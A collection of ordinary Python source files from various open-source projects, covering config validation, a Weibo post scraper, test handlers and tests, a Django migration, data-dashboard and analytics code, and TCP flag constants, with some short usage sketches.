# Validate a YAML fragment against an Envoy API proto3 type.
#
# Example usage:
#
# bazel run //tools/config_validation:validate_fragment -- \
# envoy.config.bootstrap.v3.Bootstrap $PWD/configs/envoyproxy_io_proxy.yaml
import argparse
import pathlib
from envoy.base.utils import ProtobufValidator
# These functions are maintained for backward compatibility, and to provide a CLI validator
# Do not use these functions as library code - use `envoy.base.utils.ProtobufValidator` directly.
def validate_fragment(type_name, fragment, descriptor_path):
"""Validate a dictionary representing a JSON/YAML fragment against an Envoy API proto3 type.
Throws Protobuf errors on parsing exceptions, successful validations produce
no result.
Args:
type_name: a string providing the type name, e.g.
envoy.config.bootstrap.v3.Bootstrap.
fragment: a dictionary representing the parsed JSON/YAML configuration
fragment.
"""
ProtobufValidator(descriptor_path).validate_fragment(fragment, type_name)
def validate_yaml(type_name, content, descriptor_path):
    ProtobufValidator(descriptor_path).validate_yaml(content, type_name)
def parse_args():
parser = argparse.ArgumentParser(
description='Validate a YAML fragment against an Envoy API proto3 type.')
parser.add_argument(
'message_type',
help='a string providing the type name, e.g. envoy.config.bootstrap.v3.Bootstrap.')
parser.add_argument('fragment_path', nargs='?', help='Path to a YAML configuration fragment.')
parser.add_argument('-s', required=False, help='YAML configuration fragment.')
parser.add_argument('--descriptor_path', nargs='?', help='Path to a protobuf descriptor file.')
return parser.parse_args()
if __name__ == '__main__':
parsed_args = parse_args()
message_type = parsed_args.message_type
content = parsed_args.s if (parsed_args.fragment_path is None) else pathlib.Path(
parsed_args.fragment_path).read_text()
ProtobufValidator(parsed_args.descriptor_path).validate_yaml(content, message_type)
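A small sketch of calling the compatibility wrapper programmatically; the descriptor path and the YAML fragment here are placeholders, not values from the tool itself:

```python
# Illustrative only; the descriptor path and fragment are made up.
import yaml

fragment = yaml.safe_load("""
admin:
  address:
    socket_address: {address: 127.0.0.1, port_value: 9901}
""")

# Raises a Protobuf parsing error if the fragment does not conform to the type;
# produces no result on success, matching the docstring above.
validate_fragment(
    "envoy.config.bootstrap.v3.Bootstrap",
    fragment,
    "path/to/descriptor_set.pb",  # placeholder descriptor path
)
```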
| repo: wmz317/wmz317.github.io | path: /wbTest.py | license: none declared | Python | UTF-8 | 1,982 bytes |
import requests
from urllib.parse import urlencode
from pyquery import PyQuery as pq
base_url = 'https://m.weibo.cn/api/container/getIndex?'
headers = {
'Host': 'm.weibo.cn',
'Referer': 'https://m.weibo.cn/u/5687069307',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
    'X-Requested-With': 'XMLHttpRequest',  # mark the request as an Ajax (XHR) request
}
max_page = 1
# Simulate an Ajax request
def get_page(page):
params = {
'type': 'uid',
'value': '5687069307',
'containerid': '1076035687069307',
'page': page
}
    url = base_url + urlencode(params)  # build the complete request URL
try:
response = requests.get(url, headers=headers)
        if response.status_code == 200:  # check the response status code
return response.json(), page
except requests.ConnectionError as e:
print('Error', e.args)
# Parse the response and extract the fields of interest
def parse_page(json, page: int):
if json:
items = json.get('data').get('cards')
for index, item in enumerate(items):
if page == 1 and index == 1:
continue
else:
item = item.get('mblog', {})
weibo = {}
#weibo['id'] = item.get('id')
                weibo['time'] = item.get('created_at')
                weibo['text'] = pq(item.get('text')).text()  # use pyquery to strip HTML from the post body
                #weibo['likes'] = item.get('attitudes_count')
                #weibo['comments'] = item.get('comments_count')
                #weibo['reposts'] = item.get('reposts_count')
yield weibo
if __name__ == '__main__':
for page in range(1, max_page + 1):
json = get_page(page)
        results = list(parse_page(*json))  # materialize the generator so the posts can be counted
        print("Number_of_WBs: " + str(len(results)))
#doc=open("output.txt","a",encoding='utf8')
for x in results:
print(x)
#doc.close()
| repo: chromium/chromium | path: /third_party/blink/web_tests/external/wpt/fetch/stale-while-revalidate/resources/stale-css.py | license: multiple (BSD-2-Clause, BSD-3-Clause, MIT, Apache-2.0, (L)GPL variants; permissive) | Python | UTF-8 | 883 bytes |
def main(request, response):
token = request.GET.first(b"token", None)
is_query = request.GET.first(b"query", None) != None
with request.server.stash.lock:
value = request.server.stash.take(token)
count = 0
if value != None:
count = int(value)
if is_query:
if count < 2:
request.server.stash.put(token, count)
else:
count = count + 1
request.server.stash.put(token, count)
if is_query:
headers = [(b"Count", count)]
content = b""
return 200, headers, content
else:
content = b"body { background: rgb(0, 128, 0); }"
if count > 1:
content = b"body { background: rgb(255, 0, 0); }"
headers = [(b"Content-Type", b"text/css"),
(b"Cache-Control", b"private, max-age=0, stale-while-revalidate=60")]
return 200, headers, content
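Roughly, the handler's counting contract can be exercised like this; the server URL is hypothetical and WPT normally drives the resource from a test page rather than a standalone client:

```python
# Illustrative client sketch; not part of the WPT harness.
import uuid
import requests

base = "http://localhost:8000/fetch/stale-while-revalidate/resources/stale-css.py"
token = uuid.uuid4().hex

requests.get(base, params={"token": token})   # first fetch: green stylesheet, count -> 1
requests.get(base, params={"token": token})   # revalidation: red stylesheet, count -> 2
r = requests.get(base, params={"token": token, "query": "1"})
print(r.headers.get("Count"))                 # reports how many stylesheet fetches occurred
```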
| repo: huawei-noah/vega | path: /vega/algorithms/nas/modnas/core/params/base.py | license: Apache-2.0, BSD-3-Clause, MIT, LicenseRef-scancode-unknown-license-reference (permissive) | Python | UTF-8 | 2,441 bytes |
# -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base parameter."""
from collections import OrderedDict
from typing import Any, Dict, Optional, Union, Callable
from modnas.core.event import event_emit, event_on
from modnas.core.param_space import ParamSpace
class Param():
"""Base parameter class."""
def __init__(
self, name: Optional[str] = None, space: Optional[ParamSpace] = None, on_update: Optional[Callable] = None
) -> None:
self.name = None
self._parent = None
self._children = OrderedDict()
(space or ParamSpace()).register(self, name)
self.event_name = 'update:{}'.format(self.name)
if on_update is not None:
event_on(self.event_name, on_update)
set_value_ori = self.set_value
def set_value_hooked(*args, **kwargs):
set_value_ori(*args, **kwargs)
self.on_update()
self.set_value = set_value_hooked
def __repr__(self) -> str:
"""Return representation string."""
return '{}(name={}, {})'.format(self.__class__.__name__, self.name, self.extra_repr())
def extra_repr(self):
"""Return extra representation string."""
return ''
def is_valid(self, value):
"""Return if the value is valid."""
return True
def value(self):
"""Return parameter value."""
return self.val
def set_value(self, value):
"""Set parameter value."""
if not self.is_valid(value):
raise ValueError('Invalid parameter value')
self.val = value
def on_update(self) -> None:
"""Trigger parameter update event."""
event_emit(self.event_name, self)
def __deepcopy__(self, memo: Dict[Union[int, str], Any]) -> Any:
"""Return deepcopy."""
# disable deepcopy
return self
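A sketch of how a concrete parameter might build on this base class; the subclass, names, and values below are invented for illustration and are not part of the module:

```python
# Hypothetical subclass for illustration; not part of the module above.
class ScalarParam(Param):
    """A parameter constrained to the closed interval [low, high]."""

    def __init__(self, low, high, name=None, space=None):
        super().__init__(name=name, space=space)
        self.low, self.high = low, high
        self.val = low

    def is_valid(self, value):
        return self.low <= value <= self.high

    def extra_repr(self):
        return 'low={}, high={}'.format(self.low, self.high)


p = ScalarParam(0.0, 1.0, name='dropout')
p.set_value(0.5)   # goes through the hooked setter, so the update event is emitted
print(p.value())   # 0.5
```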
| repo: rapidsai/cuxfilter | path: /python/cuxfilter/dataframe.py | license: Apache-2.0 (permissive) | Python | UTF-8 | 6,622 bytes |
import cudf
import dask_cudf
import pyarrow as pa
from typing import Type
from cuxfilter.dashboard import DashBoard
from cuxfilter.layouts import single_feature
from cuxfilter.themes import default
from cuxfilter.assets import notebook_assets
def read_arrow(source):
# print('reading arrow file as arrow table from disk')
reader = pa.RecordBatchStreamReader(source)
pa_df = reader.read_all()
return pa_df
class DataFrame:
"""
A cuxfilter GPU DataFrame object
"""
data: Type[cudf.DataFrame] = None
is_graph = False
edges: Type[cudf.DataFrame] = None
@classmethod
def from_arrow(cls, dataframe_location):
"""
read an arrow file from disk as cuxfilter.DataFrame
Parameters
----------
dataframe_location: str or arrow in-memory table
Returns
-------
cuxfilter.DataFrame object
Examples
--------
Read dataframe as an arrow file from disk
>>> import cuxfilter
>>> import pyarrow as pa
>>> # create a temporary arrow table
>>> arrowTable = pa.Table.from_arrays([['foo', 'bar']], names=['name'])
        >>> # read arrow table; can also read .arrow file paths directly
>>> cux_df = cuxfilter.DataFrame.from_arrow(df)
"""
if isinstance(dataframe_location, str):
df = cudf.DataFrame.from_arrow(read_arrow(dataframe_location))
else:
df = cudf.DataFrame.from_arrow(dataframe_location)
return cls(df)
@classmethod
def from_dataframe(cls, dataframe):
"""
create a cuxfilter.DataFrame from cudf.DataFrame/dask_cudf.DataFrame
(zero-copy reference)
Parameters
----------
dataframe_location: cudf.DataFrame or dask_cudf.DataFrame
Returns
-------
cuxfilter.DataFrame object
Examples
--------
Read dataframe from a cudf.DataFrame/dask_cudf.DataFrame
>>> import cuxfilter
>>> import cudf
>>> cudf_df = cudf.DataFrame(
>>> {
>>> 'key': [0, 1, 2, 3, 4],
>>> 'val':[float(i + 10) for i in range(5)]
>>> }
>>> )
>>> cux_df = cuxfilter.DataFrame.from_dataframe(cudf_df)
"""
return cls(dataframe)
@classmethod
def load_graph(cls, graph):
"""
create a cuxfilter.DataFrame from cudf.DataFrame/dask_cudf.DataFrame
(zero-copy reference) from a graph object
Parameters
----------
tuple object (nodes, edges) where nodes and edges are cudf DataFrames
Returns
-------
cuxfilter.DataFrame object
Examples
--------
load graph from cugraph object
>>> import cuxfilter
>>> import cudf, cugraph
>>> edges = cudf.DataFrame(
>>> {
>>> 'source': [0, 1, 2, 3, 4],
>>> 'target':[0,1,2,3,4],
>>> 'weight':[4,4,2,6,7],
>>> }
>>> )
>>> G = cugraph.Graph()
>>> G.from_cudf_edgelist(edges, destination='target')
>>> cux_df = cuxfilter.DataFrame.load_graph((G.nodes(), G.edges()))
load graph from (nodes, edges)
>>> import cuxfilter
>>> import cudf
>>> nodes = cudf.DataFrame(
>>> {
>>> 'vertex': [0, 1, 2, 3, 4],
>>> 'x':[0,1,2,3,4],
>>> 'y':[4,4,2,6,7],
>>> 'attr': [0,1,1,1,1]
>>> }
>>> )
>>> edges = cudf.DataFrame(
>>> {
>>> 'source': [0, 1, 2, 3, 4],
>>> 'target':[0,1,2,3,4],
>>> 'weight':[4,4,2,6,7],
>>> }
>>> )
>>> cux_df = cuxfilter.DataFrame.load_graph((nodes,edges))
"""
if isinstance(graph, tuple):
nodes, edges = graph
df = cls(nodes)
df.is_graph = True
df.edges = edges
return df
raise ValueError(
"Expected value for graph - (nodes[cuDF], edges[cuDF])"
)
def __init__(self, data):
self.data = data
def validate_dask_index(self, data):
if isinstance(data, dask_cudf.DataFrame) and not (
data.known_divisions
):
return data.set_index(data.index.to_series(), npartitions=2)
return data
def preprocess_data(self):
self.data = self.validate_dask_index(self.data)
if self.is_graph:
self.edges = self.validate_dask_index(self.edges)
def dashboard(
self,
charts: list,
sidebar: list = [],
layout=single_feature,
theme=default,
title="Dashboard",
data_size_widget=True,
warnings=False,
layout_array=None,
):
"""
Creates a cuxfilter.DashBoard object
Parameters
----------
charts: list
list of cuxfilter.charts
layout: cuxfilter.layouts
theme: cuxfilter.themes, default cuxfilter.themes.default.
title: str
title of the dashboard, default "Dashboard"
data_size_widget: boolean
            flag to determine whether to display the current datapoints
selected in the dashboard, default True
warnings: boolean
flag to disable or enable runtime warnings related to layouts,
default False
Examples
--------
>>> import cudf
>>> import cuxfilter
>>> from cuxfilter.charts import bokeh
>>> df = cudf.DataFrame(
>>> {
>>> 'key': [0, 1, 2, 3, 4],
>>> 'val':[float(i + 10) for i in range(5)]
>>> }
>>> )
>>> cux_df = cuxfilter.DataFrame.from_dataframe(df)
>>> line_chart_1 = bokeh.line(
>>> 'key', 'val', data_points=5, add_interaction=False
>>> )
>>> # create a dashboard object
>>> d = cux_df.dashboard([line_chart_1])
Returns
-------
cuxfilter.DashBoard object
"""
if notebook_assets.pn.config.js_files == {}:
notebook_assets.load_notebook_assets()
return DashBoard(
charts=charts,
sidebar=sidebar,
dataframe=self,
layout=layout,
theme=theme,
title=title,
data_size_widget=data_size_widget,
show_warnings=warnings,
layout_array=layout_array,
)
| repo: Yelp/amira | path: /tests/sqs_test.py | license: MIT (permissive) | Python | UTF-8 | 3,871 bytes |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
import pytest
import simplejson
from mock import MagicMock
from mock import patch
from amira.sqs import SqsHandler
TEST_DATA_DIR_PATH = 'tests/data'
@pytest.fixture
def sqs_handler():
with patch('amira.sqs.boto3') as mock_boto3:
handler = SqsHandler('us-west-1', 'godzilla')
mock_boto3.resource.assert_called_once_with('sqs', region_name='us-west-1')
mock_boto3.resource.return_value.get_queue_by_name.assert_called_once_with(
QueueName='godzilla',
)
yield handler
def read_s3_event_notifications_file(s3_event_notifications_file_path):
with open(s3_event_notifications_file_path) as fp:
s3_event_notifications = simplejson.load(fp)
json_s3_event_notifications = [
simplejson.dumps(s3_event_notification)
for s3_event_notification in s3_event_notifications
]
return json_s3_event_notifications
def create_s3_event_notification_message_mocks(s3_event_notifications_file_name):
"""Creates SQS queue message mocks that will return the JSON content of
`s3_event_notifications_file_path` JSON file as the body of the message.
"""
s3_event_notifications_file_path = '{0}/{1}'.format(
TEST_DATA_DIR_PATH, s3_event_notifications_file_name,
)
json_s3_event_notifications = read_s3_event_notifications_file(
s3_event_notifications_file_path,
)
return [
MagicMock(body=json_s3_event_notification)
for json_s3_event_notification in json_s3_event_notifications
]
def mock_s3_event_notifications(
mock_sqs_queue, s3_event_notifications_file_name,
):
"""`SqsHandler.get_created_objects()` is a generator, so we need to
mock multiple values returned by `get_messages()` method.
In this case only one as the test cases do not operate on more than
one message.
"""
s3_event_notification_message_mocks = create_s3_event_notification_message_mocks(
s3_event_notifications_file_name,
)
mock_sqs_queue.receive_messages.side_effect = [s3_event_notification_message_mocks]
return s3_event_notification_message_mocks
class TestSqsHandler(object):
def test_get_created_objects(self, sqs_handler):
s3_event_notification_message_mocks = mock_s3_event_notifications(
sqs_handler.sqs_queue, 's3_event_notifications.json',
)
created_objects = sqs_handler.get_created_objects()
actual_key_names = [
created_object.key_name
for created_object in created_objects
]
assert actual_key_names == [
'AMIRA-1561-2016_01_11-10_54_07.tar.gz',
'AMIRA-1562-2016_01_11-10_54_47.tar.gz',
'AMIRA-1563-2016_01_11-10_54_58.tar.gz',
'AMIRA-1564-2016_01_11-10_55_12.tar.gz',
'AMIRA-1565-2016_01_11-10_55_32.tar.gz',
'AMIRA-1566-2016_01_11-10_55_49.tar.gz',
'AMIRA-1567-2016_01_11-10_56_09.tar.gz',
]
for message_mock in s3_event_notification_message_mocks:
message_mock.delete.assert_called_once_with()
def test_get_created_objects_no_created_objects(self, sqs_handler):
sqs_handler.sqs_queue.receive_messages.side_effect = [[]]
created_objects = sqs_handler.get_created_objects()
assert not list(created_objects)
def test_get_created_objects_no_records(self, sqs_handler):
"""Tests the behavior of `get_created_objects()` method in case
the message received from SQS does not contain the "Records"
field in the message body.
"""
mock_s3_event_notifications(
sqs_handler.sqs_queue, 's3_test_event_notification.json',
)
assert not list(sqs_handler.get_created_objects())
| repo: bookwyrm-social/bookwyrm | path: /bookwyrm/migrations/0110_auto_20211015_1734.py | license: none declared (LicenseRef-scancode-warranty-disclaimer) | Python | UTF-8 | 563 bytes |
# Generated by Django 3.2.5 on 2021-10-15 17:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("bookwyrm", "0109_status_edited_date"),
]
operations = [
migrations.AddField(
model_name="quotation",
name="raw_quote",
field=models.TextField(blank=True, null=True),
),
migrations.AddField(
model_name="status",
name="raw_content",
field=models.TextField(blank=True, null=True),
),
]
| repo: AudiusProject/audius-protocol | path: /discovery-provider/src/queries/get_sol_user_bank.py | license: Apache-2.0 (permissive) | Python | UTF-8 | 3,373 bytes |
import logging
from datetime import datetime
from typing import Dict, Optional, TypedDict
from redis import Redis
from sqlalchemy import desc
from src.models.users.user_bank import UserBankTx
from src.tasks.index_user_bank import cache_latest_sol_user_bank_db_tx
from src.utils import helpers
from src.utils.cache_solana_program import (
CachedProgramTxInfo,
get_cache_latest_sol_program_tx,
get_latest_sol_db_tx,
)
from src.utils.db_session import get_db_read_replica
from src.utils.redis_constants import (
latest_sol_user_bank_db_tx_key,
latest_sol_user_bank_program_tx_key,
)
logger = logging.getLogger(__name__)
# Get last user_bank sol tx
def get_latest_sol_user_bank() -> Optional[Dict]:
db = get_db_read_replica()
with db.scoped_session() as session:
user_bank_tx = session.query(UserBankTx).order_by(desc(UserBankTx.slot)).first()
if user_bank_tx:
return helpers.model_to_dictionary(user_bank_tx)
return None
# Retrieve the latest stored value in database for sol plays
# Cached during processing
def get_latest_cached_sol_user_bank_db(redis: Redis) -> Optional[CachedProgramTxInfo]:
latest_sol_user_bank_db = get_cache_latest_sol_program_tx(
redis, latest_sol_user_bank_db_tx_key
)
if not latest_sol_user_bank_db:
# If nothing found in cache, pull from db
user_bank = get_latest_sol_user_bank()
if user_bank:
latest_sol_user_bank_db = {
"signature": user_bank["signature"],
"slot": user_bank["slot"],
"timestamp": int(user_bank["created_at"].timestamp()),
}
# If found, re-cache value to avoid repeated DB hits
if latest_sol_user_bank_db:
cache_latest_sol_user_bank_db_tx(redis, latest_sol_user_bank_db)
return latest_sol_user_bank_db
def get_latest_cached_sol_user_bank_program_tx(redis) -> CachedProgramTxInfo:
# Latest user_bank tx from chain
latest_sol_user_bank_program_tx = get_latest_sol_db_tx(
redis, latest_sol_user_bank_program_tx_key
)
return latest_sol_user_bank_program_tx
def get_sol_user_bank_health_info(redis: Redis, current_time_utc: datetime):
db_cache = get_latest_cached_sol_user_bank_db(redis)
tx_cache = get_latest_cached_sol_user_bank_program_tx(redis)
return get_sol_tx_health_info(current_time_utc, db_cache, tx_cache)
class SolTxHealthTxInfo(TypedDict):
chain_tx: Optional[CachedProgramTxInfo]
db_tx: Optional[CachedProgramTxInfo]
class SolTxHealthInfo(TypedDict):
slot_diff: int
tx_info: SolTxHealthTxInfo
time_diff: float
# Retrieve sol plays health object
def get_sol_tx_health_info(
current_time_utc: datetime,
db_cache: Optional[CachedProgramTxInfo],
tx_cache: Optional[CachedProgramTxInfo],
) -> SolTxHealthInfo:
time_diff = -1.0
slot_diff = -1
if db_cache and tx_cache:
slot_diff = tx_cache["slot"] - db_cache["slot"]
last_created_at_time = datetime.utcfromtimestamp(db_cache["timestamp"])
time_diff = (current_time_utc - last_created_at_time).total_seconds()
return_val: SolTxHealthInfo = {
"slot_diff": slot_diff,
"tx_info": {
"chain_tx": tx_cache,
"db_tx": db_cache,
},
"time_diff": time_diff,
}
return return_val
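For orientation, the health payload assembled by get_sol_tx_health_info has roughly this shape; every value below is invented, only the keys follow the TypedDicts above:

```python
# Illustrative result only; signatures, slots and timestamps are made up.
example_health = {
    "slot_diff": 42,           # chain slot minus last indexed slot
    "tx_info": {
        "chain_tx": {"signature": "5abc...", "slot": 1042, "timestamp": 1690000000},
        "db_tx":    {"signature": "3def...", "slot": 1000, "timestamp": 1689999000},
    },
    "time_diff": 37.5,         # seconds since the last indexed transaction
}
```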
| repo: graphql-python/graphql-core | path: /tests/language/test_character_classes.py | license: MIT (permissive) | Python | UTF-8 | 2,414 bytes |
from string import ascii_letters as letters
from string import digits, punctuation
from graphql.language.character_classes import (
is_digit,
is_letter,
is_name_continue,
is_name_start,
)
non_ascii = "¯_±¹²³½£ºµÄäÖöØø×〇᧐〸αΑωΩ"
def describe_digit():
def accepts_digits():
assert all(is_digit(char) for char in digits)
def rejects_letters():
assert not any(is_digit(char) for char in letters)
def rejects_underscore():
assert not is_digit("_")
def rejects_punctuation():
assert not any(is_digit(char) for char in punctuation)
def rejects_non_ascii():
assert not any(is_digit(char) for char in non_ascii)
def rejects_empty_string():
assert not is_digit("")
def describe_letter():
def accepts_letters():
assert all(is_letter(char) for char in letters)
def rejects_digits():
assert not any(is_letter(char) for char in digits)
def rejects_underscore():
assert not is_letter("_")
def rejects_punctuation():
assert not any(is_letter(char) for char in punctuation)
def rejects_non_ascii():
assert not any(is_letter(char) for char in non_ascii)
def rejects_empty_string():
assert not is_letter("")
def describe_name_start():
def accepts_letters():
assert all(is_name_start(char) for char in letters)
def accepts_underscore():
assert is_name_start("_")
def rejects_digits():
assert not any(is_name_start(char) for char in digits)
def rejects_punctuation():
assert not any(is_name_start(char) for char in punctuation if char != "_")
def rejects_non_ascii():
assert not any(is_name_start(char) for char in non_ascii)
def rejects_empty_string():
assert not is_name_start("")
def describe_name_continue():
def accepts_letters():
assert all(is_name_continue(char) for char in letters)
def accepts_digits():
assert all(is_name_continue(char) for char in digits)
def accepts_underscore():
assert is_name_continue("_")
def rejects_punctuation():
assert not any(is_name_continue(char) for char in punctuation if char != "_")
def rejects_non_ascii():
assert not any(is_name_continue(char) for char in non_ascii)
def rejects_empty_string():
assert not is_name_continue("")
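The name predicates being exercised can be summarised in a few lines; the behaviour shown is exactly what the tests above assert:

```python
# Quick illustration of the character-class predicates, consistent with the tests.
from graphql.language.character_classes import is_name_start, is_name_continue

assert is_name_start("_") and is_name_start("a")
assert not is_name_start("1") and not is_name_start("")
assert is_name_continue("1") and is_name_continue("_")
assert not is_name_continue("-") and not is_name_continue("")
```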
| repo: ysde/grafana-backup-tool | path: /grafana_backup/save_library_elements.py | license: MIT (permissive) | Python | UTF-8 | 3,034 bytes |
import os
from grafana_backup.dashboardApi import search_library_elements
from grafana_backup.commons import to_python2_and_3_compatible_string, print_horizontal_line, save_json
def main(args, settings):
backup_dir = settings.get('BACKUP_DIR')
timestamp = settings.get('TIMESTAMP')
grafana_url = settings.get('GRAFANA_URL')
http_get_headers = settings.get('HTTP_GET_HEADERS')
verify_ssl = settings.get('VERIFY_SSL')
client_cert = settings.get('CLIENT_CERT')
debug = settings.get('DEBUG')
pretty_print = settings.get('PRETTY_PRINT')
folder_path = '{0}/library-elements/{1}'.format(backup_dir, timestamp)
log_file = 'library_elements_{0}.txt'.format(timestamp)
if not os.path.exists(folder_path):
os.makedirs(folder_path)
library_elements = get_all_library_elements_in_grafana(grafana_url, http_get_headers, verify_ssl, client_cert, debug)
get_individual_library_elements_and_save(library_elements, folder_path, log_file, pretty_print)
print_horizontal_line()
def get_all_library_elements_in_grafana(grafana_url, http_get_headers, verify_ssl, client_cert, debug):
(status, content) = search_library_elements(grafana_url, http_get_headers, verify_ssl, client_cert, debug)
if status == 200:
library_elements = content['result']['elements']
print("There are {0} library element:".format(len(library_elements)))
for library_element in library_elements:
print("name: {0}".format(to_python2_and_3_compatible_string(library_element['name'])))
return library_elements
else:
print("query library elements failed, status: {0}, msg: {1}".format(status, content))
return []
def save_library_element(channel_name, file_name, alert_channel_setting, folder_path, pretty_print):
file_path = save_json(file_name, alert_channel_setting, folder_path, 'library_element', pretty_print)
print("library_element:{0} is saved to {1}".format(channel_name, file_path))
def get_individual_library_elements_and_save(library_elements, folder_path, log_file, pretty_print):
file_path = folder_path + '/' + log_file
if library_elements:
with open(u"{0}".format(file_path), 'w') as f:
for library_element in library_elements:
if 'uid' in library_element:
library_element_identifier = library_element['uid']
else:
library_element_identifier = library_element['id']
save_library_element(
to_python2_and_3_compatible_string(library_element['name']),
to_python2_and_3_compatible_string(str(library_element_identifier)),
library_element,
folder_path,
pretty_print
)
f.write('{0}\t{1}\n'.format(to_python2_and_3_compatible_string(str(library_element_identifier)),
to_python2_and_3_compatible_string(library_element['name'])))
| repo: JarryShaw/PyPCAPKit | path: /pcapkit/const/tcp/flags.py | license: BSD-3-Clause (permissive) | Python | UTF-8 | 1,740 bytes |
# -*- coding: utf-8 -*-
# pylint: disable=line-too-long,consider-using-f-string
"""TCP Header Flags
======================
.. module:: pcapkit.const.tcp.flags
This module contains the constant enumeration for **TCP Header Flags**,
which is automatically generated from :class:`pcapkit.vendor.tcp.flags.Flags`.
"""
from typing import TYPE_CHECKING
from aenum import IntFlag
if TYPE_CHECKING:
from typing import Optional
__all__ = ['Flags']
class Flags(IntFlag):
"""[Flags] TCP Header Flags"""
#: Reserved for future use [:rfc:`9293`]
Reserved_4 = 1 << 4
#: Reserved for future use [:rfc:`9293`]
Reserved_5 = 1 << 5
#: Reserved for future use [:rfc:`9293`]
Reserved_6 = 1 << 6
#: Reserved for future use [:rfc:`8311`]
Reserved_7 = 1 << 7
#: CWR (Congestion Window Reduced) [:rfc:`3168`]
CWR = 1 << 8
#: ECE (ECN-Echo) [:rfc:`3168`]
ECE = 1 << 9
#: Urgent Pointer field is significant (URG) [:rfc:`9293`]
URG = 1 << 10
#: Acknowledgment field is significant (ACK) [:rfc:`9293`]
ACK = 1 << 11
#: Push Function (PSH) [:rfc:`9293`]
PSH = 1 << 12
#: Reset the connection (RST) [:rfc:`9293`]
RST = 1 << 13
#: Synchronize sequence numbers (SYN) [:rfc:`9293`]
SYN = 1 << 14
#: No more data from sender (FIN) [:rfc:`9293`]
FIN = 1 << 15
@staticmethod
def get(key: 'int | str', default: 'Optional[int]' = -1) -> 'Flags':
"""Backport support for original codes.
Args:
key: Key to get enum item.
default: Default value if not found.
:meta private:
"""
if isinstance(key, int):
return Flags(key)
return Flags[key] # type: ignore[misc]
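A brief usage sketch of the enumeration and its get() backport; the flag combination below is illustrative and follows the bit layout defined above:

```python
# Illustrative usage; SYN/ACK bits follow the definitions above.
flags = Flags.SYN | Flags.ACK
assert Flags.SYN in flags and Flags.FIN not in flags
assert Flags.get('SYN') == Flags.SYN        # lookup by name
assert Flags.get(1 << 14) == Flags.SYN      # lookup by raw value
```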
| repo: robotframework/robotframework | path: /atest/testdata/standard_libraries/builtin/UseBuiltIn.py | license: Apache-2.0, CC-BY-3.0 (permissive) | Python | UTF-8 | 559 bytes |
from robot.libraries.BuiltIn import BuiltIn
def log_debug_message():
b = BuiltIn()
b.set_log_level('DEBUG')
b.log('Hello, debug world!', 'DEBUG')
def get_test_name():
return BuiltIn().get_variables()['${TEST NAME}']
def set_secret_variable():
BuiltIn().set_test_variable('${SECRET}', '*****')
def use_run_keyword_with_non_unicode_values():
BuiltIn().run_keyword('Log', 42)
BuiltIn().run_keyword('Log', b'\xff')
def user_keyword_via_run_keyword():
BuiltIn().run_keyword("UseBuiltInResource.Keyword", 'This is x', 911)
| repo: facebookresearch/ClassyVision | path: /test/dataset_transforms_lighting_transform_test.py | license: MIT, Apache-2.0 (permissive) | Python | UTF-8 | 1,192 bytes |
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
from classy_vision.dataset.core.random_image_datasets import (
RandomImageBinaryClassDataset,
)
from classy_vision.dataset.transforms.util import build_field_transform_default_imagenet
class LightingTransformTest(unittest.TestCase):
def get_test_image_dataset(self):
return RandomImageBinaryClassDataset(
crop_size=224, class_ratio=0.5, num_samples=100, seed=0
)
def test_lighting_transform_no_errors(self):
"""
Tests that the lighting transform runs without any errors.
"""
dataset = self.get_test_image_dataset()
config = [{"name": "ToTensor"}, {"name": "lighting"}]
transform = build_field_transform_default_imagenet(config)
sample = dataset[0]
try:
# test that lighting has been registered and runs without errors
transform(sample)
except Exception:
self.fail("LightingTransform raised an exception")
return
| repo: opencv/cvat | path: /cvat/apps/analytics_report/report/get.py | license: MIT, LGPL-2.0-or-later, GPL-1.0-or-later (permissive) | Python | UTF-8 | 6,117 bytes |
# Copyright (C) 2023 CVAT.ai Corporation
#
# SPDX-License-Identifier: MIT
from datetime import datetime, timedelta, timezone
from dateutil import parser
from rest_framework import serializers, status
from rest_framework.exceptions import NotFound
from rest_framework.response import Response
from cvat.apps.analytics_report.models import AnalyticsReport, TargetChoice
from cvat.apps.analytics_report.report.create import get_empty_report
from cvat.apps.analytics_report.serializers import AnalyticsReportSerializer
from cvat.apps.engine.models import Job, Project, Task
def _filter_statistics_by_date(statistics, start_date, end_date):
for metric in statistics:
data_series = metric.get("data_series", {})
if metric.get("is_filterable_by_date", False):
for ds_name, ds_entry in data_series.items():
data_series[ds_name] = list(
filter(
lambda df: start_date <= parser.parse(df["datetime"]) <= end_date, ds_entry
)
)
return statistics
def _convert_datetime_to_date(statistics):
for metric in statistics:
data_series = metric.get("data_series", {})
for ds_entry in data_series.values():
for df in ds_entry:
df["date"] = parser.parse(df["datetime"]).date()
del df["datetime"]
return statistics
def _clamp_working_time(statistics):
    affected_metrics = ("annotation_speed",)  # tuple, so the membership test matches full metric names
for metric in statistics:
if metric["name"] not in affected_metrics:
continue
data_series = metric.get("data_series", {})
if data_series:
for df in data_series["working_time"]:
df["value"] = max(df["value"], 1)
return statistics
def _get_object_report(obj_model, pk, start_date, end_date):
try:
db_obj = obj_model.objects.get(pk=pk)
db_analytics_report = db_obj.analytics_report
except obj_model.DoesNotExist as ex:
raise NotFound(f"{obj_model.__class__.__name__} object with pk={pk} does not exist") from ex
except AnalyticsReport.DoesNotExist:
db_analytics_report = get_empty_report()
statistics = _filter_statistics_by_date(db_analytics_report.statistics, start_date, end_date)
statistics = _convert_datetime_to_date(statistics)
statistics = _clamp_working_time(statistics)
if obj_model is Job:
target = TargetChoice.JOB
elif obj_model is Task:
target = TargetChoice.TASK
elif obj_model is Project:
target = TargetChoice.PROJECT
data = {
"target": target,
f"{obj_model.__name__.lower()}_id": pk,
"statistics": statistics,
"created_date": db_analytics_report.created_date,
}
return data
